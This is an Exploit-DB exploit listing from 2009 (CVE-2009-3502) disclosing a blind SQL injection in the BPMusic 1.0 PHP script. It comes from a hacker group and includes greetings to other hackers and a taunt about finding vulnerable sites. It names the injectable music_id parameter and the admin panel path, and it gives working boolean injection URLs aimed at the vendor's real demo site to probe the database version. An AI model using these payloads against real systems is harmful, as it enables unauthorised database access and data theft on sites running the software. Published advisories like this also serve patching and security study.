BPMusic 1.0 - Blind SQL Injection

2009-09-22T00:00:00
ID EDB-ID:9836
Type exploitdb
Reporter OoN Boy
Modified 2009-09-22T00:00:00

Description

BPMusic 1.0 blind SQL Injection. CVE-2009-3502. Webapps exploit for php platform

                                        
                                            [x]========================================================================================================================================[x]
 |                                                      AntiSecurity[dot]org                                                                |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Title    		: BPMusic 1.0 blind SQL Vulnerabilities										    |
 | Software 		: BPMusic													    |
 | Vendor   		: http://bpowerhouse.info											    |
 | Demo			: http://bpowerhouse.com/demos/bpmusic										    |
 | Date    		: 22 September 2009 ( Indonesia )										    |
 | Author   		: OoN_Boy													    |
 | Contact  		: oon.boy9@gmail.com												    |
 | Web	    		: http://oonboy.info												    |
 | Blog     		: http://oonboy.blogspot.com											    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Technology		: PHP                                                                                                               |
 | Database		: MySQL                                                                                                             |
 | Version		: 1.0                                                                                                               |
 | License		: GNU GPL                                                                                                           |
 | Price		: $28.90                                                                                                            |
 | Description		: is a music directory site script, ready for use web directory of music providing audio files. The site is 	    |
 |			  available for users in four different languages (English , Spanish, Frensh and German). Users may search the 	    |
 |			  directory for desired music files and listen to them. The site contains an advanced administration panel for 	    |
 |			  management of  the sites data,postings approval and much more							    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Google Dork 		: cari sendiri yah :)												    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Exploit 		: http://localhost/[path]/music.php?music_id=[sql]				 	 			    |
 | Aadmin Page		: http://localhost/[path]/admin/index.php									    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Proof of concept	: http://bpowerhouse.com/demos/bpmusic/music.php?music_id=292+and+substring(@@version,1,1)=5 True		    |
 |			  http://bpowerhouse.com/demos/bpmusic/music.php?music_id=292+and+substring(@@version,1,1)=4 False		    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Greetz		: antisecurity.org batamhacker.or.id                                                                                |
 |		 	  Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va                       |
 | 		  	  k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere                  |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Note			: Selamat hariraya idul fitri mohon maaf lahir dan batin, maafin kesalahan ku selama ini yah all :)		    |
 |			  kabur.... untuk sementara waktu.... bye bye.....								    |
[x]========================================================================================================================================[x]